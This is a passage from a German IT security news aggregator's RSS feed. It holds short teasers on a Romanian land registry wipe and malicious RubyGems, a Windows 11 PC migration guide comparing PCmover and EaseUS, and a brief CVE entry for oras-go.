<description><![CDATA[BUKAREST / LONDON (IT BOLTWISE) – Ein Hackerangriff hat in Rumänien die gesamte Datenbank des Landregisters gelöscht. Für rund eine Woche fielen offizielle Apps und Websites aus, Notare konnten keine neuen Immobiliengeschäfte mehr dokumentieren. Parallel verloren Bürger den Zugriff auf Eigentumsn...]]></description>
<link>https://tsecurity.de/de/3680912/it-security-nachrichten/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680912/it-security-nachrichten/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt/</guid>
<pubDate>Mon, 20 Jul 2026 12:54:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-romania-cadastre-land-registry-wipe-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BUKAREST / LONDON (IT BOLTWISE) – Ein Hackerangriff hat in Rumänien die gesamte Datenbank des Landregisters gelöscht. Für rund eine Woche fielen offizielle Apps und Websites aus, Notare konnten keine neuen Immobiliengeschäfte mehr dokumentieren. Parallel verloren Bürger den Zugriff auf Eigentumsnachweise und detaillierte Grundstücksdaten. Entscheidend ist, dass der Angriff nicht nur Systeme betraf, sondern offenbar […]</p>
<div><a href="https://www.it-boltwise.de/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt.html">... den vollständigen Artikel <strong>»Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/hacker-loescht-rumaeniens-gesamte-landregisterdatenbank-stillstand-im-immobilienmarkt.html">Hacker löscht Rumäniens gesamte Landregisterdatenbank – Stillstand im Immobilienmarkt</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SleeperGem: Drei bösartige RubyGems manipulieren Entwicklerrechner und Keys]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Forschende haben die Supply-Chain-Attacke „SleeperGem“ im Ruby-Ökosystem identifiziert. Drei bösartige Gems wurden im RubyGems-Registry-Verzeichnis so platziert, dass beim Installieren zusätzliche Payloads nachgeladen werden. Die Malware prüft gezielt, ob sie auf e...]]></description>
<link>https://tsecurity.de/de/3680760/it-security-nachrichten/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680760/it-security-nachrichten/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys/</guid>
<pubDate>Mon, 20 Jul 2026 11:54:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-sleepergem-rubygems-incident-response-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Forschende haben die Supply-Chain-Attacke „SleeperGem“ im Ruby-Ökosystem identifiziert. Drei bösartige Gems wurden im RubyGems-Registry-Verzeichnis so platziert, dass beim Installieren zusätzliche Payloads nachgeladen werden. Die Malware prüft gezielt, ob sie auf einer echten Entwicklermaschine läuft und umgeht damit CI-Umgebungen. Besonders kritisch: betroffene Systeme müssen laut Analyse als kompromittiert gelten und […]</p>
<div><a href="https://www.it-boltwise.de/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys.html">... den vollständigen Artikel <strong>»SleeperGem: Drei bösartige RubyGems manipulieren Entwicklerrechner und Keys«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sleepergem-drei-boesartige-rubygems-manipulieren-entwicklerrechner-und-keys.html">SleeperGem: Drei bösartige RubyGems manipulieren Entwicklerrechner und Keys</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neuer PC? So übertragen Sie alles auf Windows 11 ohne Stress]]></title>
<description><![CDATA[Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.



Umzugssoftware nimmt Ihnen diese Arbeit ab...]]></description>
<link>https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679150/windows-tipps/neuer-pc-so-uebertragen-sie-alles-auf-windows-11-ohne-stress/</guid>
<pubDate>Sun, 19 Jul 2026 10:41:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein neuer PC ist schnell gekauft – der eigentliche Aufwand beginnt danach. Programme, Dateien, Benutzerkonten und Einstellungen sollen möglichst vollständig vom alten Rechner mitkommen. Wer alles von Hand einrichtet, verliert schnell einen ganzen Tag.</p>



<p>Umzugssoftware nimmt Ihnen diese Arbeit ab und überträgt viele Inhalte in einem Durchgang. Das lohnt sich besonders, wenn der alte Windows-10-PC ersetzt wird: Zwar gibt es über erweiterte Sicherheitsupdates noch Aufschub bis 2027, langfristig führt beim Neukauf aber meist Windows 11 den Weg vor. Wir zeigen, welche Wege es für den PC-Umzug gibt und worauf Sie achten sollten.</p>



<h2 class="wp-block-heading">Welche Wege es für den Datenumzug gibt</h2>



<p>Für den Wechsel auf einen neuen PC haben Sie drei Möglichkeiten. Spezialisierte Umzugssoftware überträgt Programme, Benutzerkonten und Dateien in einem Rutsch – der bequemste Weg, wenn installierte Anwendungen mitkommen sollen.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Bildschirm ist zu klein? Dieser 17-Zöller bietet Platz für alles</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-7.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook 7 überzeugt mit einem großzügigen 17,3 Zoll FHD-Touchdisplay für Übersicht bei Office-Arbeit, Multimedia und leichtem Gaming. Der Intel® Core™ Ultra 7 Prozessor mit 32 GB RAM meistert anspruchsvolle Aufgaben, die NVIDIA® RTX™ 4050 sorgt für zusätzliche Grafikleistung bei Kreativ-Workflows. Die beleuchtete Tastatur mit Nummernblock erleichtert die Dateneingabe, Fast Charge bringt den Akku schnell wieder auf 50 %.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11348&amp;clickref=rss&amp;ued=https://www.notebooksbilliger.de/hp+omnibook+7+17+dc0177ng+888580" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook 7</a></div></div>



<p>Die Bordmittel von Windows decken primär persönliche Dateien und ausgewählte Einstellungen ab: Über ein Microsoft-Konto und OneDrive landen synchronisierte Ordner, einige Windows-Einstellungen sowie Store-Apps auf dem neuen Gerät. Klassische Desktop-Programme müssen Sie damit jedoch neu installieren.</p>



<p>Bleibt der manuelle Umzug per externer Festplatte oder NAS. Diese Methode ist günstig und transparent, aber zeitraubend. Sie kopieren Dokumente, Bilder, Downloads, Browserprofile und Projektordner selbst und installieren anschließend jede Anwendung neu. Dieser Ratgeber stellt deshalb die komfortablere Variante mit Umzugssoftware in den Mittelpunkt und vergleicht zwei verbreitete Programme.</p>



<h2 class="wp-block-heading">Windows-Umzug mit PCmover Professional</h2>



<p><a href="https://software.pcwelt.de/offer/laplink-pcmover-professional-v11/44211?x-source=rss">PCmover Professional</a> von Laplink zählt zu den bekanntesten Umzugsprogrammen für Windows. Es kopiert Anwendungen, Daten, Benutzerkonten und Einstellungen vom alten Windows-PC auf den neuen Rechner mit Windows 11. Die Software kostet ab 34,95 Euro, eine reine Testversion reicht in der Regel nicht für einen vollständigen Programmumzug.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d5d8b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2023/06/pcmover-Transferoptionen.png?w=1200" alt="Laplink PCmover Professional v11 Optionen" class="wp-image-1945143" width="1200" height="799" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Installieren Sie PCmover zunächst auf dem alten PC, also der Quelle. Nach dem Start ist die Übertragung zwischen zwei Rechnern voreingestellt. Unter „Erweiterte Optionen“ stehen zusätzlich der Umzug per Laufwerk und per Imagedatei bereit. Ein Klick auf „Übertragung zwischen PCs“ startet den Vorgang. Vor dem Fortfahren tragen Sie Name, E-Mail-Adresse und die nach dem Kauf erhaltene Seriennummer ein.</p>



<p>Installieren und starten Sie das Programm danach auf dem Ziel-PC mit Windows 11. Beide Rechner müssen sich im selben Netzwerk befinden. Ein spezielles Kabel ist nicht nötig, wenn beide PCs per LAN oder stabilem WLAN verbunden sind. Für große Datenmengen empfiehlt sich Gigabit-LAN, weil der Transfer darüber deutlich zuverlässiger und schneller läuft als über ein schwaches Funknetz.</p>



<p>PCmover sucht den Ziel-PC und stellt die Verbindung her. Anschließend zeigt die Software beide Rechner nebeneinander an. Prüfen Sie an dieser Stelle unbedingt die Übertragungsrichtung: Quelle muss der alte PC sein, Ziel der neue Windows-11-Rechner. Bei Bedarf lässt sich die Richtung umkehren.</p>



<p>Ein Klick auf „PC analysieren“ führt zur Auswahl. Hier stehen mehrere Optionen bereit, von der empfohlenen Standardübertragung bis zur manuellen Auswahl. Mit der Standardoption wird der neue PC weitgehend zum Abbild des alten – etwa mit Windows 11 statt Windows 10. </p>



<p>Über „Weiter“ erhalten Sie eine Zusammenfassung in mehreren Kategorien. Kontrollieren Sie vordergründig den Punkt „Anwendungen“: Standardmäßig sind alle übertragbaren Programme markiert; einzelne können abgewählt werden.</p>



<p>Wie lange der Umzug dauert, hängt von der Datenmenge, dem Netzwerktempo und der Anzahl der Programme ab. Bei einem gut gefüllten PC kommen schnell mehrere Stunden zusammen. Nach Abschluss meldet das Programm den Erfolg. Starten Sie den neuen PC neu, damit alle Änderungen greifen.</p>



<h2 class="wp-block-heading">Die Alternative: EaseUS Todo PCTrans</h2>



<p>Wer nicht zwingend zu PCmover greifen möchte, findet in <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans-free.html">EaseUS Todo PCTrans</a> eine verbreitete Alternative. Das Programm überträgt ebenfalls Programme, Dateien, Benutzerkonten und Einstellungen zwischen zwei Rechnern. Der Umzug von Windows 10 auf Windows 11 zählt zu den typischen Einsatzszenarien.</p>



<p>Der wichtigste Unterschied liegt beim Einstieg. EaseUS Todo PCTrans gibt es als Free-Version, die nur fünf Programme und eine zwei Gigabyte Daten überträgt. Das genügt zum Ausprobieren oder für sehr kleine Umzüge. Wer viele Programme, große Benutzerordner oder mehrere Konten übertragen will, benötigt die kostenpflichtige <a href="https://www.dpbolvw.net/click-1676582-15557692?sid=rss&amp;url=https://www.easeus.de/daten-uebertragen-software/pctrans.html">Pro-Version</a> ab 40 Euro.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d672e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/easeus-todo-pctrans-2-2.jpg?quality=50&amp;strip=all" alt="easeus-todo-pctrans" class="wp-image-3178968" width="997" height="696" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">EaseUS</p></div>



<p>Die Bedienung folgt demselben Grundmuster wie bei PCmover. Sie installieren das Programm auf beiden Rechnern und legen über „PC zu PC“ die Richtung fest: alter PC als Quelle, neuer PC als Ziel. Beide Geräte müssen sich im selben Netzwerk befinden. Danach wählen Sie aus, welche Programme, Dateien und Konten mitkommen, und starten die Übertragung.</p>



<p>Neben dem Netzwerkweg beherrscht EaseUS Todo PCTrans auch den Umzug per Imagedatei auf einem externen Datenträger. Das ist praktisch, wenn beide PCs nicht gleichzeitig verfügbar sind oder der alte Rechner nur noch eingeschränkt läuft. Der Transfer erfolgt lokal, nicht über fremde Cloud-Server.</p>



<h2 class="wp-block-heading">PCmover oder EaseUS – was passt zu wem?</h2>



<p>Beide Programme verfolgen denselben Zweck, unterscheiden sich aber bei Preis, Bedienlogik und Zielgruppe. EaseUS Todo PCTrans ist attraktiv, wenn Sie zunächst kostenlos testen oder nur wenige Programme übertragen möchten. </p>



<p>Für einen kompletten Umzug mit vielen Anwendungen und großen Datenmengen führt dagegen auch hier meist kein Weg an einer kostenpflichtigen Version vorbei.</p>



<p>PCmover Professional richtet sich stärker an Anwender, die einen möglichst vollständigen und kontrollierten Wechsel wünschen. Das Programm ist besonders interessant, wenn der neue Rechner dem alten möglichst stark ähneln soll und viele installierte Anwendungen mitkommen müssen.</p>



<p>Für einfache Fälle reicht oft die Kombination aus OneDrive, externer Festplatte und Neuinstallation der wichtigsten Programme. Für komplexe Systeme mit vielen Anwendungen, mehreren Benutzerkonten und gewachsenen Ordnerstrukturen spart Umzugssoftware dagegen viel Zeit.</p>



<h2 class="wp-block-heading">Tipp: Mailkonten auf den neuen PC umziehen</h2>



<p>Eine Windows-Neuinstallation oder ein neuer PC sind ein guter Anlass, auch das Mailprogramm zu überdenken – etwa eM Client, Thunderbird oder Outlook. Am einfachsten gelingt der Umzug, wenn Ihre Mailkonten bereits per IMAP eingerichtet sind. Bei IMAP bleiben die Nachrichten auf dem Server Ihres Mailproviders gespeichert und werden nur mit dem jeweiligen Gerät synchronisiert.</p>



<p>Der Vorteil: Sie greifen mit PC, Notebook, Smartphone oder Webmailer auf denselben Mailbestand zu. Für den Umzug richten Sie das Konto im Mailprogramm auf dem neuen Windows-PC einfach erneut ein. Dazu starten Sie den Einrichtungsassistenten, geben E-Mail-Adresse und Passwort ein und warten anschließend, bis das Programm alle Nachrichten synchronisiert hat. Je nach Postfachgröße und Internetverbindung kann das einige Zeit dauern.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d7007"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Mailstore-Home-export-IMAP-Konto.png" alt="Mailstore Home export IMAP-Konto" class="wp-image-3178966" width="1024" height="574" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Aufwendiger wird es, wenn Sie Ihre Mails bisher per POP3 abrufen. In diesem Fall liegen viele Nachrichten oft nur lokal auf dem alten Rechner. Dann sollten Sie das Postfach vor dem Wechsel sichern. Dafür eignet sich etwa <a href="https://www.pcwelt.de/article/1143948/e-mails-verwalten-mailstore-home.html">MailStore Home</a>, das für die private Nutzung kostenlos ist. Das Programm archiviert lokale Mailbestände und kann sie anschließend wieder exportieren.</p>



<p>Erstellen Sie zunächst auf dem alten PC mit MailStore Home ein Backup Ihres POP3-Postfachs und sichern Sie dieses auf einem externen Datenträger. Auf dem neuen PC installieren Sie Ihr Mailprogramm sowie MailStore Home. Dort laden Sie die Sicherung und exportieren die Nachrichten über „E-Mails exportieren“ in ein IMAP-Postfach.</p>



<p>Damit wandern die bisher nur lokal gespeicherten Mails auf den Server Ihres Providers. Anschließend stehen sie nicht nur auf dem neuen Windows-PC, sondern auch auf Smartphone, Tablet und im Webmailer synchron zur Verfügung. </p>



<p>Der Wechsel von POP3 zu IMAP lohnt sich daher besonders, wenn Sie Ihre E-Mails künftig auf mehreren Geräten nutzen möchten.</p>



<h2 class="wp-block-heading">Vor dem Umzug: Das sollten Sie beachten</h2>



<p>Unabhängig vom gewählten Programm sollten Sie vorab ein vollständiges Backup Ihrer wichtigen Daten auf einem externen Datenträger anlegen. Geht beim Transfer etwas schief, haben Sie eine unabhängige Kopie zur Hand.</p>



<p>Notieren Sie außerdem Lizenzschlüssel kostenpflichtiger Programme. Kostenlose Tools wie <a href="https://www.nirsoft.net/utils/product_cd_key_viewer.html" target="_blank" rel="noreferrer noopener">ProduKey </a>können gespeicherte Produktschlüssel auslesen, ersetzen aber keine vollständige Lizenzverwaltung – prüfen Sie daher zusätzlich die Kundenkonten der jeweiligen Softwareanbieter.</p>



<p>Manche Anwendungen verlangen nach dem Umzug eine erneute Aktivierung. Bei Programmen mit Gerätebindung kann es nötig sein, die Lizenz auf dem alten PC vorher zu deaktivieren oder im Kundenkonto freizugeben.</p>



<p>Bei Microsoft Office hängt der Aufwand von der Lizenz ab. Ein Microsoft-365-Abo oder eine an das Microsoft-Konto gebundene Office-Lizenz richten Sie auf dem neuen PC meist einfach erneut über das Konto ein. Ältere Einzelplatzlizenzen ohne Kontobindung können komplizierter sein.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d795e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Office365-Konto-Info.png?w=1200" alt="Office365 Konto-Info" class="wp-image-3178971" width="1200" height="581" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Prüfen Sie überdies, ob alle wichtigen Programme unter Windows 11 laufen. Sehr alte Tools, Spezialsoftware, Treiberpakete, Scanner-Software oder ältere VPN-Clients können Probleme verursachen. Hier ist eine Neuinstallation oft sauberer als eine blinde Übernahme.</p>



<p><strong>Wichtiger Vorab-Tipp:</strong> Deinstallieren Sie auf dem alten PC vor dem Umzug alte Druckertreiber oder tief ins System eingreifende Software (wie Antivirenprogramme von Drittanbietern). Solche Systemkomponenten werden von Umzugsprogrammen manchmal fälschlicherweise mitkopiert und können das neue Windows 11-System instabil machen.</p>



<p>Planen Sie für einen gut gefüllten PC genügend Zeit ein. Je nach Datenmenge dauert die Übertragung von einer bis zu mehreren Stunden.</p>



<p>Nach dem Umzug sollten Sie Windows Update ausführen, Programme starten, Drucker prüfen, Cloud-Synchronisierung kontrollieren und wichtige Dateien stichprobenartig öffnen.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Kann ich Programme einfach vom alten PC auf den neuen kopieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein, in der Regel reicht das Kopieren des Programmordners nicht aus. Viele Anwendungen legen Einträge in der Windows-Registry an, speichern Lizenzdaten an anderen Stellen oder installieren zusätzliche Komponenten. Deshalb müssen Programme entweder neu installiert oder mit spezieller Umzugssoftware übertragen werden.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Was ist besser: Umzugssoftware oder Neuinstallation?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Das hängt vom Zustand des alten PCs ab. Ist das System gut gepflegt und sollen viele Programme mitkommen, spart Umzugssoftware viel Zeit. Ist der alte Rechner dagegen über Jahre langsam, unübersichtlich oder fehleranfällig geworden, ist eine saubere Neuinstallation oft die bessere Wahl. Dann übernehmen Sie nur Daten und installieren Programme gezielt neu.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Werden auch Passwörter und Browserdaten übertragen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Teilweise. Browserdaten wie Lesezeichen, Verlauf und Erweiterungen lassen sich meist über das jeweilige Browserkonto synchronisieren, etwa bei Edge, Chrome oder Firefox. Gespeicherte Passwörter sollten Sie vor dem Umzug prüfen und am besten zusätzlich in einem Passwortmanager sichern. Verlassen Sie sich nicht ausschließlich darauf, dass eine Umzugssoftware alle Zugangsdaten vollständig übernimmt.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Muss der alte PC während des Umzugs weiter funktionieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Für den direkten Transfer über das Netzwerk ja. Beide Rechner müssen eingeschaltet und erreichbar sein. Alternativ können einige Programme ein Umzugsabbild auf einer externen Festplatte erstellen. Das ist praktisch, wenn der neue PC noch nicht bereitsteht oder der alte Rechner nur noch eingeschränkt nutzbar ist.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading"><strong>Was sollte ich nach dem Umzug zuerst prüfen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Starten Sie den neuen PC neu und führen Sie Windows Update aus. Danach sollten Sie wichtige Programme öffnen, Lizenzaktivierungen kontrollieren, Drucker und Scanner testen, Mailkonten prüfen und sicherstellen, dass Cloud-Dienste wie OneDrive vollständig synchronisieren. Öffnen Sie außerdem stichprobenartig wichtige Dokumente, Bilder und Projektordner.</p>
</div>
</div></div>
</div>



<p></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50151 | oras-project oras-go up to 2.6.0 BlobStore repository.go completePushAfterInitialPost improper authorization (Nessus ID 327786)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in oras-project oras-go up to 2.6.0. Impacted is the function completePushAfterInitialPost of the file registry/remote/repository.go of the component BlobStore. This manipulation causes improper authorization.

This vulnerability is registe...]]></description>
<link>https://tsecurity.de/de/3678660/sicherheitsluecken/cve-2026-50151-oras-project-oras-go-up-to-260-blobstore-repositorygo-completepushafterinitialpost-improper-authorization-nessus-id-327786/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678660/sicherheitsluecken/cve-2026-50151-oras-project-oras-go-up-to-260-blobstore-repositorygo-completepushafterinitialpost-improper-authorization-nessus-id-327786/</guid>
<pubDate>Sun, 19 Jul 2026 02:20:46 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/oras-project:oras-go">oras-project oras-go up to 2.6.0</a>. Impacted is the function <code>completePushAfterInitialPost</code> of the file <em>registry/remote/repository.go</em> of the component <em>BlobStore</em>. This manipulation causes improper authorization.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-50151">CVE-2026-50151</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[EU Orders Google to Open Search Data and Android Features to Competitors Amid Privacy, Security Concerns]]></title>
<description><![CDATA[The European Commission has officially instructed Google to hand over its internal search registry to direct marketplace competitors. This groundbreaking legal command forces the massive American search provider to open its popular Android operating system to rival software tools. The binding spe...]]></description>
<link>https://tsecurity.de/de/3678341/it-security-nachrichten/eu-orders-google-to-open-search-data-and-android-features-to-competitors-amid-privacy-security-concerns/</link>
